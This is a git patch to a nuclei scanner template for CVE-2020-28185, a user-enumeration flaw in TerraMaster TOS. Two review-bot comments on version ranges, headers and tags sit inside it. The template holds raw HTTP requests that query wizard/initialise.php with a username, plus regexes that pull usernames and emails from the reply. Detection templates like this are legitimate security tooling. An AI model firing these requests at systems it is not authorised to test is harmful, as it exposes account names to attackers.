From d836e594adac616198aaae9f45abff792f45b490 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 9 Aug 2023 13:08:58 +0530
Subject: [PATCH] fix template
---
 http/cves/2020/CVE-2020-28185.yaml | 13 ++++++-------
 1 file changed, 6 insertions(+), 7 deletions(-)
diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml
index 305c9a9c91..fa96180314 100644
--- a/http/cves/2020/CVE-2020-28185.yaml
+++ b/http/cves/2020/CVE-2020-28185.yaml
@@ -4,24 +4,23 @@ info:
 name: TerraMaster TOS < 4.2.06 - User Enumeration
 author: pussycat0x
 severity: medium
+ description: |
+ User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
 reference:
 - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
 - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
+ - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
 metadata:
 max-request: 1
 verified: true
 fofa-query: '"TerraMaster" && header="TOS"'
- tags: tamronos,enum
+ tags: cve,cve2020,tamronos,enum,tos
 http:
 - raw:
 - |
 GET /tos/index.php?user/login HTTP/1.1
 Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
 - |
 POST /wizard/initialise.php HTTP/1.1
@@ -29,7 +28,7 @@ http:
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
- Referer: {{BaseURL}}/tos/index.php?user/login
+ Referer: {{RootURL}}/tos/index.php?user/login
 tab=checkuser&username=admin
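Review bot: The added `description` gives the affected range as `<= 4.2.06`, but the `name` line kept as context in the first hunk still says `< 4.2.06`, so a host running exactly 4.2.06 reads as unaffected from the title and as affected from the description. Align the title with whichever range the vendor advisory supports, e.g. `name: TerraMaster TOS <= 4.2.06 - User Enumeration`. In the same hunk, `max-request: 1` does not appear to match the two raw requests (the GET and the POST) that the template sends. Now that the `cve` tags are present, a `classification:` block carrying `cve-id: CVE-2020-28185` would let result triage key on the CVE identifier rather than on the tag string. The retained tag `tamronos` also looks like a misspelling and is worth checking against the tag list.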
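Review bot: The POST request in the second hunk still sends the hard-coded `Accept-Encoding: gzip, deflate` header, while this commit strips the same header from the first request. Unless the endpoint needs it, dropping it here keeps the two requests consistent. For the `Referer` change, a short comment such as `# RootURL: the Referer must not inherit a path from the target URL` would record why `{{BaseURL}}` was replaced. It has to sit above the request's `- |` line, because a `#` inside the block scalar would be sent as part of the request. The start of this request is outside the hunk.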
@@ -53,4 +52,4 @@ http:
 part: body_2
 regex:
 - '"username":"(.*?)"'
- - '"email":"(.*?)"'
\ No newline at end of file
+ - '"email":"(.*?)"'